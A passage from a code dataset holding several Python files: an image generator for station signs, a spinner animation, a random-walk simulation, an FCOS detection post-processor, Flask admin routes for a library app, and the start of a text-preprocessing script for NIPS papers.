bytearray(im.tobytes('raw', 'BGRa'))\n surface = cairo.ImageSurface.create_for_data(arr, format, im.width, im.height)\n return surface\n \n # str (path to the png)\n def __createInterchange(self, list, direction=\"N\", thickness=0):\n assert type(direction) is str, \"must be str\"\n assert direction in (\"N\", \"E\", \"W\", \"S\"), \"must be 'N', 'S', 'E' or 'W'\"\n \n path = \"result/temp_line.png\"\n \n if direction in (\"N\", \"S\"):\n maxWidth = 0\n for i in list:\n for d in (0, 1):\n size = (53 + 18 if d else 67 + 21) * 1.1\n font = ImageFont.truetype(\n font='font/FreeSansBold.ttf' if d else 'font/SourceHanSerifTC-Bold.otf',\n size=int(size)\n )\n \n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n i.enName if d else i.zhName,\n font=font\n )\n \n if w > maxWidth: maxWidth = w\n \n width, height = 41+(maxWidth+thickness)*2, 122*len(list)\n \n png = Image.new( \"RGBA\", (width, height) )\n png_draw = ImageDraw.Draw(png)\n \n surface = self.__from_pil(png)\n ctx = cairo.Context(surface)\n \n for i in range(len(list)):\n ctx.move_to(width/2, 122*len(list))\n ctx.line_to(width/2, 122*len(list) - 122*(len(list)-i))\n ctx.set_source_rgb(\n int(list[i].lineColor[0:2],16)/255,\n int(list[i].lineColor[2:4],16)/255,\n int(list[i].lineColor[4:6],16)/255\n )\n ctx.set_line_width(41)\n ctx.stroke()\n \n surface.write_to_png(path)\n png2 = Image.open(path)\n \n for d in (0, 1):\n size = (53 + 18 if d else 67 + 21)\n font = ImageFont.truetype(\n font='font/FreeSansBold.ttf' if d else 'font/SourceHanSerifTC-Bold.otf',\n size=size\n )\n \n for i in range(len(list)):\n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n list[i].zhName,\n font=font\n )\n w1, h1 = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n \"hg\",\n font=font\n )\n \n x = width/2 + 41/2 * (2*d-1) + w * (d-1) + (20 * (2*d-1)) + 2 * (d-1)\n y = height/2 - h1/2 * d + h/2 * (d-1) + 12 * (d-1)\n \n for j in range(-thickness,thickness+1,1):\n for k in range(-thickness,thickness+1,1):\n png_draw.text(\n (\n x + j,\n y + 122 * i - ( 122*(len(list)-1) - 122*(len(list)-1)/2) + k\n ),\n text=list[i].enName if d else list[i].zhName,\n font=font, fill=list[i].outline\n )\n \n png_draw.text(\n (\n x,\n y + 122 * i - ( 122*(len(list)-1) - 122*(len(list)-1)/2)\n ),\n text=list[i].enName if d else list[i].zhName,\n font=font, fill=list[i].textColor\n )\n \n png.alpha_composite(png2)\n png.save(\"result/__interchange.png\".format(list[i].key, d))\n \n else:\n pass\n \n os.remove(path)","sub_path":"station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":15191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"251351968","text":"import os\nimport sys\nimport time\n\nfrom get_holiday_color import *\n\nCOLORS = [RED for _ in range(10)] + [GREEN for _ in range(10)]\n\ndef twiddle(secs):\n len_sleep = 0.1\n times = int(secs / len_sleep)\n frames=['|', '/', '-', '\\\\']\n for i in range(times):\n color_index = i % len(COLORS)\n index = i % len(frames)\n sys.stdout.write(COLORS[color_index])\n sys.stdout.write(frames[index])\n sys.stdout.flush()\n time.sleep(len_sleep)\n sys.stdout.write('\\b')\n sys.stdout.write(DEFAULT_COLOR)\n\nif __name__ == \"__main__\":\n twiddle(3)\n","sub_path":"present/resources/twiddle.py","file_name":"twiddle.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"385537580","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport numba\n\nimport stats\n\n# website says tau (step time) is about 0.5 sec, but we just care about steps for now\n@numba.jit()\ndef backtrack_steps():\n t = 0\n x = 0\n\n directions = np.array([-1, 1], dtype=int)\n\n while x <= 0:\n x = x + np.random.choice(directions)\n t += 1\n\n return t\n\n@numba.jit()\ndef gen_backtracks(n=10000):\n bt_reps = np.empty(n)\n\n for i in range(n):\n #print(i)\n bt_reps[i] = backtrack_steps()\n\n return bt_reps\n\nrerun_simulation = True\nfilename = '../../data/my_pause_steps.csv'\n\nif rerun_simulation:\n # binsize again?\n bts = gen_backtracks()\n\n # doesn't illustrate the power law distributed data very well\n #plt.hist(gen_backtracks(), normed=True)\n #plt.title('Backtrack step counts on pause')\n #plt.show()\n\n bt_sorted, bt_cpf = stats.ecdf(bts)\n \n # turn the recorded step counts into a DataFrame\n d = {'steps until +1': bts}\n df = pd.DataFrame(data=d)\n\n # save the data as a DataFrame to save it in a manner consistent with theme today\n df.to_csv(filename, index=False)\n\nif not rerun_simulation:\n df = pd.read_csv(filename)\n\n# determine a reasonable range to plot the histogram over\nmax_pwr = np.log(df['steps until +1'].max()) / np.log(10)\n\nplt.hist(df['steps until +1'], bins=np.logspace(0, max_pwr, 50))\nplt.gca().set_xscale('log')\nplt.gca().set_yscale('log')\nplt.title('Steps before simulated pauses end')\nplt.xlabel('Number of steps')\nplt.ylabel('Cumulative probability')\nplt.show()\n\n\"\"\"\nCCDF exponent of -1/2 => PDF exponent of -3/2 b/c CDF is integral (but CCDF?)\n\"\"\"\n","sub_path":"created/3/monte_carlo.py","file_name":"monte_carlo.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"567161734","text":"import torch\n\nfrom ..inference import RPNPostProcessor\nfrom ..utils import permute_and_flatten\n\nfrom maskrcnn_benchmark.modeling.box_coder import BoxCoder\nfrom maskrcnn_benchmark.modeling.utils import cat\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\nfrom maskrcnn_benchmark.structures.boxlist_ops import cat_boxlist\nfrom maskrcnn_benchmark.structures.boxlist_ops import boxlist_nms\nfrom maskrcnn_benchmark.structures.boxlist_ops import remove_small_boxes\nimport torch.nn.functional as F\nimport numpy as np\n\n\nclass FCOSPostProcessor(torch.nn.Module):\n \"\"\"\n Performs post-processing on the outputs of the RetinaNet boxes.\n This is only used in the testing.\n \"\"\"\n def __init__(\n self,\n pre_nms_thresh,\n pre_nms_top_n,\n nms_thresh,\n fpn_post_nms_top_n,\n min_size,\n num_classes,\n vis_labels\n ):\n \"\"\"\n Arguments:\n pre_nms_thresh (float)\n pre_nms_top_n (int)\n nms_thresh (float)\n fpn_post_nms_top_n (int)\n min_size (int)\n num_classes (int)\n box_coder (BoxCoder)\n \"\"\"\n super(FCOSPostProcessor, self).__init__()\n self.pre_nms_thresh = pre_nms_thresh\n self.pre_nms_top_n = pre_nms_top_n\n self.nms_thresh = nms_thresh\n self.fpn_post_nms_top_n = fpn_post_nms_top_n\n self.min_size = min_size\n self.num_classes = num_classes\n self.vis_labels = vis_labels\n\n def forward_for_single_feature_map(\n self, locations, box_cls_set,\n box_regression, centerness,\n image_sizes, show_box_cls):\n \"\"\"\n Arguments:\n anchors: list[BoxList]\n box_cls: tensor of size N, A * C, H, W\n box_regression: tensor of size N, A * 4, H, W\n \"\"\"\n box_prob_set = []\n for _box_cls in np.array(list(box_cls_set.values()))[[2]]: #\n N, C, H, W = _box_cls.shape\n _box_cls = _box_cls.view(N, C, H, W).permute(0, 2, 3, 1)\n box_prob_set.append(_box_cls.reshape(N, -1, C).sigmoid())\n box_cls = torch.exp(torch.log(torch.stack(box_prob_set)).mean(dim=0))\n # max_score = box_prob_set[-1].max()\n # box_prob_set[:-1] = [box_prob / box_prob.max() * max_score for box_prob in box_prob_set[:-1]]\n # box_cls = torch.stack(box_prob_set).max(dim=0)[0]\n centerness = None\n\n # put in the same format as locations\n box_regression = box_regression.view(N, 4, H, W).permute(0, 2, 3, 1)\n box_regression = box_regression.reshape(N, -1, 4)\n if centerness is not None:\n centerness = centerness.view(N, 1, H, W).permute(0, 2, 3, 1)\n centerness = centerness.reshape(N, -1).sigmoid()\n\n if self.vis_labels:\n # box_prob_set.extend([box_cls, centerness, centerness[:,:,None]*box_prob_set[-1]])\n show_box_cls(box_prob_set, N, H, W, C, self.pre_nms_thresh)\n\n candidate_inds = box_cls > self.pre_nms_thresh\n pre_nms_top_n = candidate_inds.view(N, -1).sum(1)\n pre_nms_top_n = pre_nms_top_n.clamp(max=self.pre_nms_top_n)\n\n # multiply the classification scores with centerness scores\n if centerness is not None:\n box_cls = (box_cls * centerness[:, :, None])\n\n results = []\n for i in range(N):\n per_box_cls = box_cls[i]\n per_candidate_inds = candidate_inds[i]\n per_box_cls = per_box_cls[per_candidate_inds]\n\n per_candidate_nonzeros = per_candidate_inds.nonzero()\n per_box_loc = per_candidate_nonzeros[:, 0]\n per_class = per_candidate_nonzeros[:, 1] + 1\n\n per_box_regression = box_regression[i]\n per_box_regression = per_box_regression[per_box_loc]\n per_locations = locations[per_box_loc]\n\n per_pre_nms_top_n = pre_nms_top_n[i]\n\n if per_candidate_inds.sum().item() > per_pre_nms_top_n.item():\n per_box_cls, top_k_indices = \\\n per_box_cls.topk(per_pre_nms_top_n, sorted=False)\n per_class = per_class[top_k_indices]\n per_box_regression = per_box_regression[top_k_indices]\n per_locations = per_locations[top_k_indices]\n\n detections = torch.stack([\n per_locations[:, 0] - per_box_regression[:, 0],\n per_locations[:, 1] - per_box_regression[:, 1],\n per_locations[:, 0] + per_box_regression[:, 2],\n per_locations[:, 1] + per_box_regression[:, 3],\n ], dim=1)\n\n h, w = image_sizes[i]\n boxlist = BoxList(detections, (int(w), int(h)), mode=\"xyxy\")\n boxlist.add_field(\"labels\", per_class)\n boxlist.add_field(\"scores\", per_box_cls)\n boxlist.add_field(\"det_locations\", per_locations)\n boxlist = boxlist.clip_to_image(remove_empty=False)\n boxlist = remove_small_boxes(boxlist, self.min_size)\n results.append(boxlist)\n\n return results\n\n def forward(self, locations, box_cls_set, box_regression, centerness, image_sizes, images=None, targets=None):\n \"\"\"\n Arguments:\n anchors: list[list[BoxList]]\n box_cls: list[tensor]\n box_regression: list[tensor]\n image_sizes: list[(h, w)]\n Returns:\n boxlists (list[BoxList]): the post-processed anchors, after\n applying box decoding and NMS\n \"\"\"\n cascade_num = len(box_cls_set)\n for box_cls in box_cls_set.values():\n fpn_level_num = len(box_cls)\n break\n box_cls_set_level_first = [{} for _ in range(fpn_level_num)]\n for name, box_cls in box_cls_set.items():\n for lvl, cls in enumerate(box_cls):\n box_cls_set_level_first[lvl][name] = cls\n box_cls_set = box_cls_set_level_first\n if centerness is None:\n centerness = [None] * fpn_level_num\n\n show_box_cls = BoxClsShower(fpn_level_num, images=images, targets=targets) if self.vis_labels else None\n\n sampled_boxes = []\n for _, (l, o, b, c) in enumerate(zip(locations, box_cls_set, box_regression, centerness)):\n sampled_boxes.append(\n self.forward_for_single_feature_map(\n l, o, b, c, image_sizes, show_box_cls\n )\n )\n\n boxlists = list(zip(*sampled_boxes))\n boxlists = [cat_boxlist(boxlist) for boxlist in boxlists]\n boxlists = self.select_over_all_levels(boxlists)\n\n return boxlists\n\n # TODO very similar to filter_results from PostProcessor\n # but filter_results is per image\n # TODO Yang: solve this issue in the future. No good solution\n # right now.\n def select_over_all_levels(self, boxlists):\n num_images = len(boxlists)\n results = []\n for i in range(num_images):\n scores = boxlists[i].get_field(\"scores\")\n labels = boxlists[i].get_field(\"labels\")\n locations = boxlists[i].get_field(\"det_locations\") # add here\n boxes = boxlists[i].bbox\n boxlist = boxlists[i]\n result = []\n # skip the background\n for j in range(1, self.num_classes):\n inds = (labels == j).nonzero().view(-1)\n\n scores_j = scores[inds]\n boxes_j = boxes[inds, :].view(-1, 4)\n locations_j = locations[inds]\n boxlist_for_class = BoxList(boxes_j, boxlist.size, mode=\"xyxy\")\n boxlist_for_class.add_field(\"scores\", scores_j)\n boxlist_for_class.add_field(\"det_locations\", locations_j) # add here\n boxlist_for_class = boxlist_nms(\n boxlist_for_class, self.nms_thresh,\n score_field=\"scores\"\n )\n num_labels = len(boxlist_for_class)\n boxlist_for_class.add_field(\n \"labels\", torch.full((num_labels,), j,\n dtype=torch.int64,\n device=scores.device)\n )\n result.append(boxlist_for_class)\n\n result = cat_boxlist(result)\n number_of_detections = len(result)\n\n # Limit to max_per_image detections **over all classes**\n if number_of_detections > self.fpn_post_nms_top_n > 0:\n cls_scores = result.get_field(\"scores\")\n image_thresh, _ = torch.kthvalue(\n cls_scores.cpu(),\n number_of_detections - self.fpn_post_nms_top_n + 1\n )\n keep = cls_scores >= image_thresh.item()\n keep = torch.nonzero(keep).squeeze(1)\n result = result[keep]\n results.append(result)\n return results\n\n\ndef make_fcos_postprocessor(config):\n pre_nms_thresh = config.MODEL.FCOS.INFERENCE_TH\n pre_nms_top_n = config.MODEL.FCOS.PRE_NMS_TOP_N\n nms_thresh = config.MODEL.FCOS.NMS_TH\n fpn_post_nms_top_n = config.TEST.DETECTIONS_PER_IMG\n\n box_selector = FCOSPostProcessor(\n pre_nms_thresh=pre_nms_thresh,\n pre_nms_top_n=pre_nms_top_n,\n nms_thresh=nms_thresh,\n fpn_post_nms_top_n=fpn_post_nms_top_n,\n min_size=0,\n num_classes=config.MODEL.FCOS.NUM_CLASSES,\n vis_labels=config.MODEL.FCOS.DEBUG.VIS_LABELS\n )\n\n return box_selector\n\n\nclass BoxClsShower(object):\n \"\"\"\n map0-4: [0.125, 0.25, 0.5, 0.75, 1.0] ** 2 area range\n map5: centerness\n \"\"\"\n def __init__(self, fpn_level=5, scatter_topk=10, EPS=1e-8, images=None, targets=None):\n self.fpn_level = fpn_level\n self.level_count = 0\n self.box_probs = []\n self.scatter_topk = scatter_topk\n self.EPS = EPS\n self.row_sub_fig = 4\n self.single_fig_size = 4\n self.titles = None\n self.images = images\n self.targets = targets\n\n def find_local_max(self, box_prob):\n B, C, H, W = box_prob.shape\n max_prob, idx = F.max_pool2d_with_indices(box_prob, 3, 1, 1, return_indices=True)\n max_prob = max_prob[0, 0]\n box_prob = box_prob[0, 0]\n is_local_max = torch.nonzero(box_prob == max_prob)\n y, x = is_local_max[:, 0], is_local_max[:, 1]\n idx = torch.argsort(-box_prob[y, x])\n k = self.scatter_topk\n y = y[idx[:k]]\n x = x[idx[:k]]\n return y.cpu().numpy(), x.cpu().numpy(), box_prob[y, x]\n\n def mask_to_image(self, box_prob, upsample=False):\n img = self.images.tensors[0:1]\n if upsample:\n box_prob = F.upsample(box_prob[None, None, :, :], img.shape[2:], mode='bilinear')[0, 0]\n else:\n img = F.upsample(img, box_prob.shape, mode='bilinear')\n img = img[0].permute((1, 2, 0)).cpu() + torch.Tensor([102.9801, 115.9465, 122.7717])\n return img * box_prob[:, :, None] / 255\n\n def __call__(self, box_prob_set, N, H, W, C, th):\n import matplotlib.pyplot as plt\n box_probs = []\n for i, box_prob in enumerate(box_prob_set):\n if box_prob.numel() == N*H*W*C:\n box_prob = box_prob.reshape(-1, H, W, C)[:1]\n elif box_prob.numel() == N*H*W:\n box_prob = box_prob.reshape(-1, H, W, 1)[:1]\n box_prob = box_prob.max(dim=-1, keepdim=True)[0].permute((0, 3, 1, 2))\n box_probs.append(box_prob.cpu())\n\n # merge FPN multi-level score map to one map by resize add.\n if len(self.box_probs) == 0:\n self.box_probs = box_probs\n else:\n for i, p in enumerate(box_probs): # for each area th score map\n box_prob = self.box_probs[i]\n if box_prob.numel() < p.numel():\n box_prob = F.upsample(box_prob, p.shape[2:], mode='bilinear')\n else:\n p = F.upsample(p, box_prob.shape[2:], mode='bilinear')\n self.box_probs[i] = torch.max(torch.stack([p, box_prob]), dim=0)[0]\n self.level_count += 1\n\n if self.level_count == self.fpn_level:\n # show each area th score map\n n_figs = len(self.box_probs)\n r = self.row_sub_fig if n_figs >= self.row_sub_fig else n_figs\n c = int(np.ceil((n_figs/r)))\n plt.figure(figsize=(r * self.single_fig_size, c * self.single_fig_size)) # (W, H)\n for i, box_prob in enumerate(self.box_probs):\n y, x, score = self.find_local_max(box_prob)\n box_prob = box_prob[0, 0]\n max_p = box_prob.max()\n std = box_prob.std()\n box_prob /= max_p\n if self.images is not None:\n box_prob = self.mask_to_image(box_prob)\n box_prob = box_prob.numpy()\n plt.subplot(c, r, i+1)\n plt.imshow(box_prob)\n plt.scatter(x, y, color='r', s=20 * score)\n if self.titles is not None:\n title = self.titles[i]\n else:\n title = 'map {}'.format(i)\n plt.title(\"{}, max:{:.2f}, std: {:.2f}\".format(title, float(max_p), float(std)))\n plt.show()\n self.level_count = 0\n del self.box_probs\n self.box_probs = []\n","sub_path":"tiny_benchmark_Salpha/maskrcnn_benchmark/modeling/rpn/cascade_fcos/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":13381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"628786126","text":"from nose.tools import set_trace\nfrom functools import wraps\nimport flask\nfrom flask import (\n Response,\n redirect,\n make_response\n)\nimport os\n\nfrom api.app import app\nfrom api.config import Configuration\n\nfrom core.util.problem_detail import ProblemDetail\nfrom core.app_server import returns_problem_detail\n\nfrom controller import setup_admin_controllers\nfrom templates import (\n admin as admin_template,\n admin_sign_in_again as sign_in_again_template,\n)\n\nimport csv, codecs, cStringIO\nfrom StringIO import StringIO\nimport urllib\n\n# The secret key is used for signing cookies for admin login\napp.secret_key = Configuration.get(Configuration.SECRET_KEY)\n\n@app.before_first_request\ndef setup_admin():\n if getattr(app, 'manager', None) is not None:\n setup_admin_controllers(app.manager)\n\ndef allows_admin_auth_setup(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n setting_up = (app.manager.admin_sign_in_controller.auth == None)\n return f(*args, setting_up=setting_up, **kwargs)\n return decorated\n\ndef requires_admin(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if 'setting_up' in kwargs:\n setting_up = kwargs.pop('setting_up')\n else:\n setting_up = False\n\n if not setting_up:\n admin = app.manager.admin_sign_in_controller.authenticated_admin_from_request()\n if isinstance(admin, ProblemDetail):\n return app.manager.admin_sign_in_controller.error_response(admin)\n elif isinstance(admin, Response):\n return admin\n\n return f(*args, **kwargs)\n return decorated\n\ndef requires_csrf_token(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if 'setting_up' in kwargs:\n setting_up = kwargs.get('setting_up')\n else:\n setting_up = False\n if not setting_up and flask.request.method in [\"POST\", \"PUT\", \"DELETE\"]:\n token = app.manager.admin_sign_in_controller.check_csrf_token()\n if isinstance(token, ProblemDetail):\n return token\n return f(*args, **kwargs)\n return decorated\n\n@app.route('/admin/GoogleAuth/callback')\n@returns_problem_detail\ndef google_auth_callback():\n return app.manager.admin_sign_in_controller.redirect_after_sign_in()\n\n@app.route('/admin/sign_in')\n@returns_problem_detail\ndef admin_sign_in():\n return app.manager.admin_sign_in_controller.sign_in()\n\n@app.route('/admin/works///', methods=['GET'])\n@returns_problem_detail\n@requires_admin\ndef work_details(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.details(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////classifications', methods=['GET'])\n@returns_problem_detail\n@requires_admin\ndef work_classifications(data_source, identifier_type, identifier):\n data = app.manager.admin_work_controller.classifications(data_source, identifier_type, identifier)\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/works////complaints', methods=['GET'])\n@returns_problem_detail\n@requires_admin\ndef work_complaints(data_source, identifier_type, identifier):\n data = app.manager.admin_work_controller.complaints(data_source, identifier_type, identifier)\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/works////edit', methods=['POST'])\n@returns_problem_detail\n@requires_admin\ndef edit(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.edit(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////suppress', methods=['POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef suppress(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.suppress(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////unsuppress', methods=['POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef unsuppress(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.unsuppress(data_source, identifier_type, identifier)\n\n@app.route('/works////refresh', methods=['POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef refresh(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.refresh_metadata(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////resolve_complaints', methods=['POST'])\n@returns_problem_detail\n@requires_admin\n@requires_csrf_token\ndef resolve_complaints(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.resolve_complaints(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////edit_classifications', methods=['POST'])\n@returns_problem_detail\n@requires_admin\n@requires_csrf_token\ndef edit_classifications(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.edit_classifications(data_source, identifier_type, identifier)\n\n@app.route('/admin/complaints')\n@returns_problem_detail\n@requires_admin\ndef complaints():\n return app.manager.admin_feed_controller.complaints()\n\n@app.route('/admin/suppressed')\n@returns_problem_detail\n@requires_admin\ndef suppressed():\n \"\"\"Returns a feed of suppressed works.\"\"\"\n return app.manager.admin_feed_controller.suppressed()\n\n@app.route('/admin/genres')\n@returns_problem_detail\n@requires_admin\ndef genres():\n \"\"\"Returns a JSON representation of complete genre tree.\"\"\"\n data = app.manager.admin_feed_controller.genres()\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/bulk_circulation_events')\n@returns_problem_detail\n@requires_admin\ndef bulk_circulation_events():\n \"\"\"Returns a CSV representation of all circulation events with optional\n start and end times.\"\"\"\n data, date = app.manager.admin_dashboard_controller.bulk_circulation_events()\n if isinstance(data, ProblemDetail):\n return data\n\n class UnicodeWriter:\n \"\"\"\n A CSV writer for Unicode data.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n # Redirect output to a queue\n self.queue = StringIO()\n self.writer = csv.writer(self.queue, dialect=dialect, **kwds)\n self.stream = f\n self.encoder = codecs.getincrementalencoder(encoding)()\n\n def writerow(self, row):\n self.writer.writerow(\n [s.encode(\"utf-8\") if hasattr(s, \"encode\") else \"\" for s in row]\n )\n # Fetch UTF-8 output from the queue ...\n data = self.queue.getvalue()\n data = data.decode(\"utf-8\")\n # ... and reencode it into the target encoding\n data = self.encoder.encode(data)\n # write to the target stream\n self.stream.write(data)\n # empty queue\n self.queue.truncate(0)\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n\n output = StringIO()\n writer = UnicodeWriter(output)\n writer.writerows(data)\n response = make_response(output.getvalue())\n response.headers['Content-Disposition'] = \"attachment; filename=circulation_events_\" + date + \".csv\"\n response.headers[\"Content-type\"] = \"text/csv\"\n return response\n\n@app.route('/admin/circulation_events')\n@returns_problem_detail\n@requires_admin\ndef circulation_events():\n \"\"\"Returns a JSON representation of the most recent circulation events.\"\"\"\n data = app.manager.admin_dashboard_controller.circulation_events()\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/stats')\n@returns_problem_detail\n@requires_admin\ndef stats():\n data = app.manager.admin_dashboard_controller.stats()\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/libraries', methods=['GET', 'POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef libraries():\n data = app.manager.admin_settings_controller.libraries()\n if isinstance(data, ProblemDetail):\n return data\n if isinstance(data, Response):\n return data\n return flask.jsonify(**data)\n\n@app.route(\"/admin/collections\", methods=['GET', 'POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef collections():\n data = app.manager.admin_settings_controller.collections()\n if isinstance(data, ProblemDetail):\n return data\n if isinstance(data, Response):\n return data\n return flask.jsonify(**data)\n\n@app.route(\"/admin/admin_auth_services\", methods=['GET', 'POST'])\n@returns_problem_detail\n@allows_admin_auth_setup\n@requires_csrf_token\n@requires_admin\ndef admin_auth_services():\n data = app.manager.admin_settings_controller.admin_auth_services()\n if isinstance(data, ProblemDetail):\n return data\n if isinstance(data, Response):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/sign_in_again')\ndef admin_sign_in_again():\n \"\"\"Allows an admin with expired credentials to sign back in\n from a new browser tab so they won't lose changes.\n \"\"\"\n admin = app.manager.admin_sign_in_controller.authenticated_admin_from_request()\n csrf_token = app.manager.admin_sign_in_controller.get_csrf_token()\n if isinstance(admin, ProblemDetail) or csrf_token is None or isinstance(csrf_token, ProblemDetail):\n redirect_url = flask.request.url\n return redirect(app.manager.url_for('admin_sign_in', redirect=redirect_url))\n return flask.render_template_string(sign_in_again_template)\n\n@app.route('/admin/web')\n@app.route('/admin/web/')\n@app.route('/admin/web/collection//book/')\n@app.route('/admin/web/collection/')\n@app.route('/admin/web/book/')\n@app.route('/admin/web/') # catchall for single-page URLs\ndef admin_view(collection=None, book=None, **kwargs):\n setting_up = (app.manager.admin_sign_in_controller.auth == None)\n if not setting_up:\n admin = app.manager.admin_sign_in_controller.authenticated_admin_from_request()\n csrf_token = app.manager.admin_sign_in_controller.get_csrf_token()\n if isinstance(admin, ProblemDetail) or csrf_token is None or isinstance(csrf_token, ProblemDetail):\n redirect_url = flask.request.url\n if (collection):\n quoted_collection = urllib.quote(collection)\n redirect_url = redirect_url.replace(\n quoted_collection,\n quoted_collection.replace(\"/\", \"%2F\"))\n if (book):\n quoted_book = urllib.quote(book)\n redirect_url = redirect_url.replace(\n quoted_book,\n quoted_book.replace(\"/\", \"%2F\"))\n return redirect(app.manager.url_for('admin_sign_in', redirect=redirect_url))\n else:\n csrf_token = None\n show_circ_events_download = (\n \"core.local_analytics_provider\" in (Configuration.policy(\"analytics\") or [])\n )\n return flask.render_template_string(\n admin_template,\n csrf_token=csrf_token,\n home_url=app.manager.url_for('acquisition_groups'),\n show_circ_events_download=show_circ_events_download,\n setting_up=setting_up,\n )\n\n@app.route('/admin')\n@app.route('/admin/')\ndef admin_base(**kwargs):\n return redirect(app.manager.url_for('admin_view'))\n\n@app.route('/admin/static/circulation-web.js')\n@returns_problem_detail\ndef admin_js():\n directory = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"node_modules\", \"simplified-circulation-web\", \"dist\")\n return flask.send_from_directory(directory, \"circulation-web.js\")\n\n@app.route('/admin/static/circulation-web.css')\n@returns_problem_detail\ndef admin_css():\n directory = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"node_modules\", \"simplified-circulation-web\", \"dist\")\n return flask.send_from_directory(directory, \"circulation-web.css\")\n\n","sub_path":"api/admin/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":12562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"144522334","text":"# -*- coding: utf-8 -*-\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport random\nfrom scipy import sparse\nimport itertools\nfrom scipy.io import savemat, loadmat\nimport re\nimport string\nimport sys\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser(description='nips preprocessing')\n\nparser.add_argument('--folds', type=int, default=3, help='number of folds')\nparser.add_argument('--data_path', type=str, help='directory containing data')\nparser.add_argument('--split', type=float, help='percentage of test data')\n\nargs = parser.parse_args()\n\n# Maximum / minimum document frequency\nmax_df = 0.7\nmin_df = 100 # choose desired value for min_df\n\n# Read stopwords\nwith open('stops.txt', 'r') as f:\n stops = f.read().split('\\n')\n\n# Read data\nprint('reading text file...')\ndata_file = '../../data/papers.csv'\ninit_docs = list(pd.read_csv(data_file)['paper_text'])\n\ninit_docs = [re.findall(r'''[\\w']+|[.,!?;-~{}`´_<=>:/@*()&'$%#\"]''', init_docs[doc]) for doc in range(len(init_docs))]\n\ndef contains_punctuation(w):\n return any(char in string.punctuation for char in w)\n\ndef contains_numeric(w):\n return any(char.isdigit() for char in w)\n \n# Remove documents with length less than 10 and greater than 95th percentile.\ndef remove_outlier(docs):\n lengths = np.array([len(doc) for doc in docs])\n docs = [docs[i] for i in np.where((lengths > 10) & (lengths < np.percentile(lengths, 95)))[0]]\n\n return docs\n\n# Removes all words with any punctuation or digits in them.\ninit_docs = [[w.lower() for w in init_docs[doc] if not contains_punctuation(w)] for doc in range(len(init_docs))]\ninit_docs = [[w for w in init_docs[doc] if not contains_numeric(w)] for doc in range(len(init_docs))]\ninit_docs = [[w for w in init_docs[doc] if len(w)>1] for doc in range(len(init_docs))]\ninit_docs = [\" \".join(init_docs[doc]) for doc in range(len(init_docs))]\n\n# Create count vectorizer\nprint('counting document frequency of words...')\ncvectorizer = CountVectorizer(min_df=min_df, max_df=max_df, stop_words=None)\ncvz = cvectorizer.fit_transform(init_docs).sign()\n\n# Get vocabulary\nprint('building the vocabulary...')\nsum_counts = np.asarray(cvz.sum(axis=0))[0]\nv_size = sum_counts.shape[0]\nprint('initial vocabulary size: {}'.format(v_size))\n\n# Sort elements in vocabulary and also remove stop words from the list\nvocab = sorted([(i, word) for i, word in enumerate(cvectorizer.vocabulary_) if word not in stops], key=lambda x: x[0])\nvocab = [w for i, w in vocab]\ndel cvectorizer\n\n# Split in train/test/valid\nprint('tokenizing documents and splitting into train/test/valid...')\ntsSize = int(len(init_docs) * args.split)\nnum_docs_tr = trSize = len(init_docs) - tsSize\n\n#idx_permute = np.random.permutation(num_docs_tr).astype(int)\nidx_permute = np.arange(num_docs_tr)\n\n# Remove words not in train_data\nvocab = list(set([w for idx_d in range(trSize) for w in init_docs[idx_permute[idx_d]].split() if w in vocab]))\nword2id = dict([(w, j) for j, w in 